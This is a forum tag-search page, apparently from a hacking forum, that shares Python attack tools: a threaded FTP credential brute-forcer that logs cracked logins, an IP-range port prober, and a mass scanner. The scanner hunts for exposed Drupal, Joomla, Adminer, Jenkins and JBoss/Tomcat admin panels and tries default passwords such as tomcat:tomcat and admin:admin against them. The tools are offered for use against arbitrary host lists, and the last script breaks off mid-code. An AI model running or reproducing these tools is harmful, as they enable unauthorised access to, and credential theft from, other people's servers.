Search the Community

Showing results for tags 'python3'.

Found 12 results

  1. #!/usr/bin/python3
"""
FTP-Bruteforcer 4 FXP-TERMiNAL.iNFO
by SpliTerZ.tw!XX
Faster than an ICE
"""
import socket
import sys
import threading
import time


def CheckForLogin(target, username, password):
    """Try a single USER/PASS pair against the FTP service on port 21."""
    sock = socket.socket()
    sock.settimeout(0.45)
    try:
        server = (target, 21)
        user = "USER " + username + "\r\n"
        pwd = "PASS " + password + "\r\n"
        sock.connect(server)
        sock.recv(4096)                      # banner
        sock.sendall(user.encode())
        sock.recv(4096)                      # 331 reply
        sock.sendall(pwd.encode())
        answer = sock.recv(4096).decode('utf-8')
        if "230" in answer:                  # 230 = login successful
            with open('bruted_ftp', 'a') as out:
                out.write(target + ":21 " + username + ":" + password + "\n")
            print("[x][x][x][x][x] Success on IP: " + target + "![x][x]\n")
        sock.close()
    except Exception:
        print("Login failed!\n")


if sys.argv[1]:
    hosts = open(sys.argv[1]).read().splitlines()
    usernames = sys.argv[2].split(",")
    passwords = open(sys.argv[3]).read().splitlines()
    for host in hosts:
        for user in usernames:
            for password in passwords:
                T = threading.Thread(target=CheckForLogin, args=(host, user, password))
                # Keep at most argv[4] threads alive at once.
                if threading.active_count() <= int(sys.argv[4]):
                    T.start()
                else:
                    time.sleep(0.3)
                    T.start()
                    T.join()
    exit()

Usage: python3 ftp-brute.py hostlist.txt user1,user2,user3,user4,... passwords.txt threadcount
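For comparison only, the same single-login check can be written with Python's standard ftplib module instead of hand-rolled FTP commands over a socket. This is a minimal sketch, not part of the posted script; the function name check_login_ftplib is made up for illustration.

from ftplib import FTP, all_errors


def check_login_ftplib(target, username, password, timeout=0.45):
    """Return True if the FTP service on port 21 accepts this USER/PASS pair."""
    try:
        ftp = FTP()
        ftp.connect(target, 21, timeout=timeout)
        ftp.login(username, password)  # raises error_perm on a 530 reply
        ftp.quit()
        return True
    except all_errors:
        return False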
  2. import re
import struct
import socket

# Matches a dotted-quad IPv4 address with each octet in 0-255.
IPV4PATTERN = re.compile(r'^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$')


class InvalidIPError(Exception):
    pass


class IPV4Range:
    def __init__(self, start, end):
        ''' Define an IPv4 range '''
        self.start = _validate_ip(start)
        self.end = _validate_ip(end)
        self.current = None

    def next(self):
        ''' Returns the next IP for this range.
        Returns None if called after reaching the end. '''
        if self.current != self.end:
            if self.current is not None:
                self.current = _increase_ip(self.current)
            else:
                self.current = self.start
        else:
            return None
        return self.current

    @staticmethod
    def knock_on_port(addr, port, timeout=1):
        ''' Tries to open a TCP connection to addr on the given port.
        Returns a tuple (status, error) where status is a boolean and
        error is an error string or None. '''
        try:
            conn = socket.create_connection((addr, port), timeout)
        except socket.error as e:
            return (False, str(e))
        conn.close()
        return (True, None)


def _validate_ip(addr):
    if not IPV4PATTERN.match(addr):
        raise InvalidIPError('%s is not a valid IPv4 address.' % addr)
    return addr


def _increase_ip(addr):
    ''' Calculate the next IP address '''
    return _long2ip(_ip2long(addr) + 1)


def _ip2long(addr):
    return struct.unpack('!L', socket.inet_aton(addr))[0]


def _long2ip(long):
    return socket.inet_ntoa(struct.pack('!L', long))

Attachment: SCAN.RAR
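A short usage sketch for the class above, assuming the module is saved as scan.py (the real filename inside SCAN.RAR is not shown): it walks a small range and knocks on port 80 of every address.

from scan import IPV4Range  # assumed module name

r = IPV4Range('192.168.0.1', '192.168.0.10')
addr = r.next()
while addr is not None:
    status, error = IPV4Range.knock_on_port(addr, 80, timeout=1)
    print(addr, 'open' if status else 'closed (%s)' % error)
    addr = r.next()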
  3. #!/usr/bin/python
#-*- coding:utf-8 -*-
import inspect
import re
import urllib2
import threading
import sys
import ssl
import requests


class read_file_ip():
    """ Read File line per line """

    def __init__(self, file):
        try:
            self.file = open(file, "r+")
        except:
            print "[ERROR] Cant open File"
        self.actual_line = ""

    def next_line(self):
        """ Moves the pointer to the next line and returns it """
        try:
            line = self.file.next().rstrip()
        except StopIteration:
            line = False
        except AttributeError:
            line = False
        self.actual_line = line
        return line

    def actual_line(self):
        """ Returns the actual line, doesn't move the pointer """
        return self.actual_line


class tools():
    """ Here you can store all functions which you want to use a few times """

    @staticmethod
    def logging(file, value):
        """ Log something to a file """
        log_file = open(file, "a")
        log_file.write(value + "\r\n")
        log_file.close()

    @staticmethod
    def create_http_url(host, port, file = "/", prot = "http"):
        """ Create Url for Urllib2 """
        return "%s://%s:%s%s" % (prot, host, port, file)

    @staticmethod
    def http_get(ip, port, file = "", timeout = None, url = None, ssl = False):
        """ GET HTTP status code, html and url from url or ip + file """
        if url == None:
            if ssl == False:
                prot = "http"
            else:
                prot = "https"
            if port == None:
                port = 80
            if file == None:
                raise Exception("ERR: func_http_get: no url or file specified")
            url = "%s://%s:%s%s" % (prot, ip, port, file)
        if timeout == None:
            timeout = scan.conf_timeout
        try:
            conn = urllib2.urlopen(url, timeout = timeout)
        except urllib2.HTTPError as e:
            return [True, e.code, url, e.read()]
        except urllib2.URLError as e:
            return [False, None, None, None]
        except urllib2.socket.timeout as e:
            return [False, None, None, None]
        except requests.exceptions.SSLError as e:
            return e.message
        return [True, conn.code, url, conn.read()]

    @staticmethod
    def get_string_between(string, start, end):
        try:
            end_of_string = string.index(start) + len(start)
            start_of_string = string.index(end, end_of_string)
            return string[end_of_string:start_of_string]
        except:
            return False

    @staticmethod
    def get_http_headers(url, timeout = None):
        """ Get HTTP headers and return them as a dictionary """
        main_url = url
        target_headers_dict = {}
        if timeout == None:
            timeout = scan.conf_timeout
        try:
            target_urllib = urllib2.urlopen(main_url, timeout = timeout)
        except urllib2.HTTPError as e:
            return {"Error" : e}
        except urllib2.URLError as e:
            return {"Error" : e}
        except urllib2.socket.timeout as e:
            return {"Error" : e}
        except:
            return {"Error" : "Unknown"}
        target_headers = target_urllib.info().headers
        for i in target_headers:
            i = i.strip()
            items = i.split(": ")
            try:
                target_headers_dict[items[0]] = items[1]
            except IndexError:
                print items  # headers without a value are just printed
        return target_headers_dict

    def check_if_any_from_arr_in_string(string, whitelist = None, blacklist = None):
        """ Check if any item from array is in string. Allows black- and whitelist. """
        if whitelist == None and blacklist == None:
            return False
        elif whitelist == None:
            whitelist = []
        elif blacklist == None:
            blacklist = []
        for i in blacklist:
            print i
        if any(k in string for k in whitelist) and any(k not in string for k in blacklist):
            return True
        else:
            return False

    def regex_not_match(string, regex):
        """ Returns True if regex does NOT match, false if it matches.
Needed for check_if_any_reg_from_arr_in_string() """ if re.match(regex, string) == None: return True else: return False def check_if_any_reg_from_arr_in_string(string, whitelist = None, blacklist = None): """ Checks if any regex from array is in string. Allows black and whitelist. """ if whitelist == None and blacklist == None: return False elif whitelist == None: whitelist == [] elif blacklist == None: blacklist == [] if any(re.match(k, string) for k in whitelist) and any(regex_not_match(string, k) for k in blacklist): return True else: return False @staticmethod def http_basic_auth(theurl, username, password): passman = urllib2.HTTPPasswordMgrWithDefaultRealm() # this creates a password manager passman.add_password(None, theurl, username, password) # because we have put None at the start it will always # use this username/password combination for urls # for which `theurl` is a super-url authhandler = urllib2.HTTPBasicAuthHandler(passman) # create the AuthHandler opener = urllib2.build_opener(authhandler) urllib2.install_opener(opener) # All calls to urllib2.urlopen will now use our handler # Make sure not to include the protocol in with the URL, or # HTTPPasswordMgrWithDefaultRealm will be very confused. # You must (of course) use it when fetching the page though. try: pagehandle = urllib2.urlopen(theurl) except urllib2.HTTPError as e: return [False, e] # authentication is now handled automatically for us return [True, pagehandle.read()] class scan(): """ Class which does the Scanning Part. Here you can also add new scan modules. """ def __init__(self, timeout): self.mod_scan_list = [] self.func_scan_modules() self.conf_timeout = int(timeout) def check(self, ip, port): print "Scanning ",ip, port for mod in self.mod_scan_list: #print mod eval("self.module_scan_%s(\"%s\", %s)" %(mod, ip, port)) print "Finished ",ip, port def func_scan_modules(self): all_funcs = inspect.getmembers(self, inspect.ismethod) for func in all_funcs: func_name = eval("self.%s" %(func[0])) func_args = inspect.getargspec(func_name) func_real_name_split = func[0].split("_") #print func_args if func_real_name_split[0] == "module": if func_real_name_split[1] == "scan": self.mod_scan_list.append(func_real_name_split[2]) print "[Module] Scan: %s" %(func_real_name_split[2]) def module_scan_drupal1(self, ip, port): ############################################################# # Scan for Drupal (all versions) and log them ############################################################# __info__ = {"name" : "drupal", "log_result_file" : "log_drupal1.txt", "log_unknwn_result_file" : "unknwn_results_drupal1.txt", "paths" : ["/Drupal", "/admin/build", "/blog", "/cms", "/community", "/content", "/core", "/developer", "/drupal", "/drupal/user/login?destination=admin", "/includes", "/logout", "/modules", "/page", "/shop", "/site", "/store", "/vendor", "/web", "/weblog", "/website", "/drupal/drupal6", "/drupal/drupal7", "/drupal/drupal8", "/modules/devel", "/sites/all/themes/adaptivetheme/at_admin", "/sites/all/modules/date/date_migrate/date_migrate_example", "/sites/all/modules/date", "/sites/all/modules/devel", "/sites/mysite/modules/contrib/views_bulk_operations", "/sites/mysite/modules/contrib/devel", "Cmsgarden\Cmsscanner\Detector\Module", "/modules/ctools"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: main_server_info = tools().get_http_headers(main_url+path) if main_server_info.get("Expires") == "Sun, 19 Nov 1978 05:00:00 GMT": 
tools().logging(__info__['log_result_file'], main_url+path+" Server:"+path+ " "+main_server_info.get("X-Generator")) def module_scan_drupal2(self, ip, port): ############################################################# # Scan for Drupal (all versions) and log them ############################################################# __info__ = {"name" : "drupal", "log_result_file" : "log_drupal2.txt", "log_unknwn_result_file" : "unknwn_results_drupal2.txt", "paths" : ["/Drupal", "/admin/build", "/blog", "/cms", "/community", "/content", "/core", "/developer", "/drupal", "/drupal/user/login?destination=admin", "/includes", "/logout", "/modules", "/page", "/shop", "/site", "/store", "/vendor", "/web", "/weblog", "/website", "/drupal/drupal6", "/drupal/drupal7", "/drupal/drupal8", "/modules/devel", "/sites/all/themes/adaptivetheme/at_admin", "/sites/all/modules/date/date_migrate/date_migrate_example", "/sites/all/modules/date", "/sites/all/modules/devel", "/sites/mysite/modules/contrib/views_bulk_operations", "/sites/mysite/modules/contrib/devel", "Cmsgarden\Cmsscanner\Detector\Module", "/modules/ctools"], "marks" : ["Drupal"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path+"/user/login" target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] Drupal:", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_joomla1(self, ip, port): ############################################################# # Scan Hosts for installed Joomla and log them ############################################################# __info__ = {"name" : "joomla", "log_result_file" : "log_joomla1.txt", "log_unknwn_result_file" : "unknwn_results_joomla1.txt", "paths" : ["/joomla", "/cms", "/Joomla", "/administrator/help/en-GB/toc.json", "/administrator/language/en-GB/install.xml", "/plugins/system/debug/debug.xml", "/administrator/", "/joomla/joomla1.5", "/joomla/joomla2.5", "/joomla/joomla3.5"], "marks" : ["Joomla!", "http://www.joomla.org", "for=\"modlgn_username\">"], "marks_1.0x" : ["<meta name=\"generator\" content=\"Joomla! - Copyright (C) 2005 - 2007 Open Source Matters.\" />"], "marks_1.5x" : ["<meta name=\"generator\" content=\"Joomla! 
1.5 - Open Source Content Management\" />"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path+"/administrator" target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: if any(k in target_return[3] for k in __info__['marks']): joomla_version = "UNKNOWN" if any(k in target_return[3] for k in __info__['marks_1.0x']): joomla_version = "1.0.x" if any(k in target_return[3] for k in __info__['marks_1.5x']): joomla_version = "1.5.x" result_line = "%s Version: %s Server: %s" %(main_url+path ,joomla_version, main_server_info['Server']) print "[*] JOOMLA:", target_url, "Version:", joomla_version tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_adminer(self, ip, port): ############################################################# #Scan for log_adminer_DB_LogIn by [email protected]@R-LightS ############################################################# __info__ = {"name" : "adminer", "log_result_file" : "log_adminer.txt", "log_unknwn_result_file" : "unknwn_results_adminer.txt", "paths" : ["/_adminer.php", "/ad.php", "/adminer/index.php", "/adminer1.php", "/mirasvit_adminer_431.php", "/mirasvit_adminer-4.2.3.php", "/latest.php", "/adminer-4.7.0.php", "/wp-content/uploads/adminer.php", "/wp-content/plugins/adminer/inc/editor/index.php", "/wp-content/adminer.php", "/adminer/adminer-4.7.0.php", "/upload/adminer.php", "/uploads/adminer.php", "/adminer/adminer.php", "/adminer/adminer.php", "/mysql-adminer.php", "/wp-admin/adminer.php", "/wp-admin/mysql-adminer.php", "/adminer/", "/adminer-4.2.5-en.php", "/adminer-4.2.5-mysql.php", "/adminer-4.2.5.php", "/adminer-4.3.0-en.php", "/adminer-4.3.0-mysql.php", "/adminer-4.3.0.php", "/adminer-4.3.1-en.php", "/adminer-4.3.1-mysql.php", "/adminer-4.3.1.php", "/adminer-4.4.0-en.php", "/adminer-4.4.0-mysql.php", "/adminer-4.4.0.php", "/adminer-4.5.0-en.php", "/adminer-4.5.0-mysql.php", "/adminer-4.5.0.php", "/adminer-4.6.0-en.php", "/adminer-4.6.0-mysql.php", "/adminer-4.6.0.php", "/adminer-4.6.1-en.php", "/adminer-4.6.1-mysql.php", "/adminer-4.6.1.php", "/adminer-4.3.0-en.php", "/adminer-4.3.1-mysql.php", "/adminer-4.3.1.php", "/adminer.php"], "marks" : ["Adminer", "https://www.adminer.org/de/"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] Adminer:", target_url tools().logging(__info__['log_result_file'], target_url) else: tools().logging(__info__['log_unknwn_result_file'], target_url) def module_scan_opencart(self, ip, port): ############################################################# # Scan Hosts for OpenCart and add. paths to exploits ! 
# by ##[email protected]## , [email protected]@R-LightS and L1ne:1337 THxxx ############################################################# __info__ = {"name" : "OpenCart", "log_result_file" : "log_opencart.txt", "log_unknwn_result_file" : "unknwn_results_opencart.txt", "paths" : ["/admin/common/login.php", "/opencart/upload", "/system/startup.php", "/admin/index.php", "/admin/config.php", "/install/index.php", "/catalog/controller/payment/authorizenet_aim.php", "/info.php", "/admin/controller/common/login.php", "/admin/controller/extension/payment.php"], "marks" : ["OpenCart", "https://www.opencart.com", "OpenCart 1", "Powered By OpenCart", "Shopping cart", "shop", "Vivid Ads Shopping Cart", "ShopMaker v1.0", "Powered by CS-Cart - Shopping Cart Software", "OpenCart 2", "OpenCart 3", "powered by OpenCart"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] OpenChart:", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_prestashop(self, ip, port): ############################################################# # Scan Hosts for installed Prestashop and log them by [email protected]@R-LightS ############################################################# __info__ = {"name" : "Prestashop", "log_result_file" : "log_prestashop.txt", "log_unknwn_result_file" : "unknwn_results_prestashop.txt", "paths" : ["/store/admin", "/administrator", "/myshopadminpanel", "/adminfolder123", "/admin"], "marks" : ["prestashop", "Prestashop 1.1", "Prestashop 1.2", "Prestashop 1.3", "Prestashop 1.4", "Prestashop 1.5", "Prestashop 1.6", "Prestashop 1.7", "Prestashop 1.8", "www.prestashop.com()", "Powered by Prestashop"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] Prestashop:", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_wordpress(self, ip, port): ############################################################# # Scan Hosts for installed Wordpress and log them ############################################################# __info__ = {"name" : "wordpress", "log_result_file" : "log_wordpress.txt", "log_unknwn_result_file" : "unknwn_results_wordpress.txt", "paths" : ["/wordpress", "/wp", "/blog", "wp-login.php", "/wordpress/wp-login.php", "/Wordpress", "/Blog"], "marks" : ["wp-submit", "wp_attempt_focus()", "Powered by WordPress", "?action=lostpassword"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for 
path in __info__['paths']: target_url = main_url+path+"/wp-login.php" target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] WordPress:", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_httpserver(self, ip, port): ############################################################# # Log HTTPServer Information such as used Serversoftware # and Version if possible and log them ############################################################# __info__ = {"name" : "httpserverinfo", "log_result_file" : "log_httpserver.txt"} target_url = tools().create_http_url(ip, port, file = "", prot = "http") headers = tools().get_http_headers(target_url) try: headers_server = headers['Server'] except KeyError, TypeError: headers_server = "Unknown" #print headers_server tools().logging(__info__['log_result_file'], target_url+" Server:"+headers_server) def module_scan_phpcgi(self, ip, port): ############################################################# # Scan Hosts for PHPCGI and log them ############################################################# __info__ = {"name" : "phpcgi", "log_usec_result_file" : "log_php_cgi.txt", "paths" : ["/cgi-bin/php", "/cgi-bin/php5"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) if target_return[0] == False: print "Host down" break if target_return[1] == 200: tools().logging(__info__['log_usec_result_file'], target_url) def module_scan_ejbinvoker(self, ip, port): ############################################################# update:29.01.21 # Scan Hosts for installed Jboss/Tomcat Servers Ports to scan: (8080,9111,9832) # having a EJBInvoker and log them ############################################################# __info__ = {"name" : "EJBInvokerServlet", "log_usec_result_file" : "usec_result_ejb.txt", "log_sec_result_file" : "sec_results_ejb.txt", "log_unknwn_result_file" : "unknwn_results_ejb.txt", "paths" : ["/status?full=true"], "marks" : ["EJBInvokerServlet", "JMXInvokerServlet", "WWW-Authenticate: Basic realm=JBoss HTTP Invoker"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) if target_return[0] == False: print "Host down" break if target_return[1] == 200: #Might be unsecured # Check with k not in ... 
mark_fuzzed that the pma is not fucked up ;) if any(k in target_return[3] for k in __info__['marks']): print "[*] EJB (USEC):",target_url tools().logging(__info__['log_usec_result_file'], target_url) else: print "[*] EJB (UKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], target_url) elif target_return[1] == 203: #Might be protected with htaccess print "[*] EJB (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) def module_scan_jenkins(self, ip, port): #############################################################update:29.01.21 # Scan Hosts for installed Jenkins Server and log them Ports to scan: (80,82,84,100,443,515,1024,2002,2086,2121,2555,3428,3749,4444,4506, # 4840,5000,5432,5801,5858,7070,7777,8000,8066,8080,8081,8082,8086,8044, # 8087,8443,8500,9000,9002,9090,9095,9200,9595,9999,13579,55553,55554,60001) ############################################################# __info__ = {"name" : "jenkins", "log_usec_result_file" : "usec_result_jenkins.txt", "log_create_result_file" : "create_results_jenkins.txt", "log_sec_result_file" : "sec_results_jenkins.txt", "log_unknwn_result_file" : "unknwn_results_jenkins.txt", "paths" : ["/asynchPeople/", "/computer/", "/hudson/login", "/hudson/script", "/jenkins/login", "/jenkins/script", "/login", "/pview/", "/scripts" "/script", "/securityRealm/createAccount", "/signup", "/systemInfo", "/systeminf", "/manage" "/userContent/", "/view/All/builds", "/view/All/newjob"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 200: #Might be unsecured if target_return[3].find("println(Jenkins.instance.pluginManager.plugins)") != -1: print "[*] Jenkins (UNSEC):",target_url tools().logging(__info__['log_usec_result_file'], target_url) print target_return[3] elif target_return[3].find("\">Create an account</a> if you are not a member yet.</div></div></td></tr>") != -1: #might create account print "[*] Jenkins (CREATE):",target_url tools().logging(__info__['log_create_result_file'], target_url) print target_return[3] elif target_return[3].find("<title>Jenkins</title>") != -1: print "[*] Jenkins (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) print target_return[3] else: tools().logging(__info__['log_unknwn_result_file'], target_url) elif target_return[1] == 203: #Might be protected with htaccess print "[*] Jenkins (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) def module_scan_jmx1(self, ip, port): ############################################################# # Scan for Jboss/Tomcat servers having a admin panel and update:29.01.21 # brute for standard accounts and log them Ports to scan: (8081,8080,8090,8443,3541,8086,9080,) ############################################################# __info__ = {"name" : "jmx", "log_sec_result_file" : "log_jmx1_secured.txt", "log_usec_result_file" : "log_jmx1_unsecured.txt", "log_unknwn_result_file" : "unknwn_results_jmx1.txt", "log_bruted_result_file" : "log_jmx1_bruted.txt", "paths" : ["/jmx-console", "/admin-console/", "/EJBInvokerServlet", "/web-console/AOPBinding.jsp", "/web-console/Invoker", "/jadmin-console/", "/web-console/status", "/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo" "/admin-console/", "/ROOT", "/add", "/balancer", "/dav", 
"/deploy", "/examples", "/examples/jsp/index.html", "/examples/jsp/snp/snoop.jsp", "/examples/jsp/source.jsp", "/examples/servlet/HelloWorldExample", "/examples/servlet/SnoopServlet", "/examples/servlet/TroubleShooter", "/examples/servlet/default/jsp/snp/snoop.jsp", "/examples/servlet/default/jsp/source.jsp", "/examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample", "/examples/servlet/org.apache.catalina.INVOKER.SnoopServlet", "/examples/servlet/org.apache.catalina.INVOKER.TroubleShooter", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp", "/examples/servlet/snoop", "/examples/servlets/index.html", "/examples/../manager/html", "/examples/%2e%2e/manager/html", "/examples/%252e%252e/manager/html", "/host-manager", "/host-manager/add", "/host-manager/host-manager.xml", "/host-manager/html/*", "/host-manager/list", "/host-manager/remove", "/host-manager/start", "/host-manager/stop", "/html/*", "/install", "/j4p", "/jmxproxy/*", "/jsp-examples", "/manager/list", "/manager/manager.xml", "/manager/reload", "/manager/remove", "/manager/resources", "/manager/roles", "/manager/save", "/manager/serverinfo", "/manager/sessions", "/manager/start", "/manager/status.xsd", "/manager/status/*", "/manager/stop", "/manager/undeploy", "/reload", "/remove", "/resources", "/roles", "/save", "/serverinfo", "/servlet/default/", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.HTMLManagerServlet", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.ManagerServlet", "/servlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.WebdavServlet/", "/servlets-examples", "/sessions", "/start", "/status/*", "/stop", "/tomcat-docs", "/undeploy", "/webdav", "/webdav/index.html", "/webdav/servlet/org.apache.catalina.servlets.WebdavServlet/", "/webdav/servlet/webdav/", "/invoker/JMXInvokerServlet" "/web-console/ServerInfo.jsp" "/invoker/", "/JMXInvokerServlet", "/jbossmq-httpil/", "/jbossws/services", "/jmx-console/HtmlAdaptor", "/web-console", "/manager/html", "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo"], "mark_sec" : ["main Manager page", "&lt;role rolename=\"manager-gui\"/&gt;", "Manager App HOW-TO"], "mark_usec" : ["JBoss JMX Management Console", "x-powered-by jboss", "jboss http.favicon.hash:-656811182"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 404: continue #Skip 404 Things target_server_info = tools().get_http_headers(main_url) headers = 
tools().get_http_headers(main_url) try: headers_server = headers['Server'] except KeyError: headers_server = "Unknown" result_line = "%s Server: %s" %(target_url, headers_server) if target_return[1] == 200 or target_return[1] == 401: #Might be unsecured if any(k in target_return[3] for k in __info__['mark_sec']): if tools().http_basic_auth(target_url, "tomcat", "tomcat")[0] == True: result_line += " Account: tomcat / tomcat" print "[*] JMX (BRUTED):",target_url, "Login: tomcat:tomcat" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "tomcat", "t0mcat")[0] == True: result_line += " Account: tomcat / t0mcat" print "[*] JMX (BRUTED):",target_url, "Login: tomcat:t0mcat" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "tomcat", "admin")[0] == True: result_line += " Account: tomcat / admin" print "[*] JMX (BRUTED):",target_url, "Login: tomcat:admin" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "admin", "tomcat")[0] == True: result_line += " Account: admin / tomcat" print "[*] JMX (BRUTED):",target_url, "Login: admin:tomcat" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "admin", "admin")[0] == True: result_line += " Account: admin / admin" print "[*] JMX (BRUTED):",target_url, "Login: admin:admin" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "admin", "manager")[0] == True: result_line += " Account: admin / manager" print "[*] JMX (BRUTED):",target_url, "Login: admin:manager" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "manager", "manager")[0] == True: result_line += " Account: manager / manager" print "[*] JMX (BRUTED):",target_url, "Login: manager:manager" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "manager", "admin")[0] == True: result_line += " Account: manager / admin" print "[*] JMX (BRUTED):",target_url, "Login: manager:admin" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "admin", "root")[0] == True: result_line += " Account: admin / root" print "[*] JMX (BRUTED):",target_url, "Login: admin:root" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "root", "admin")[0] == True: result_line += " Account: root / admin" print "[*] JMX (BRUTED):",target_url, "Login: root:admin" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "root", "root")[0] == True: result_line += " Account: root / root" print "[*] JMX (BRUTED):",target_url, "Login: root:root" tools().logging(__info__['log_bruted_result_file'], result_line) else: print "[*] JMX (SEC):",target_url tools().logging(__info__['log_sec_result_file'], result_line) elif any(k in target_return[3] for k in __info__['mark_usec']): print "[*] JMX (USEC):",target_url tools().logging(__info__['log_usec_result_file'], result_line) else: print "[*] JMX (UKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) elif target_return[1] != 404: #Needs Login but can be bruted print "[*] JMX (UNKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_jmx2(self, ip, port): 
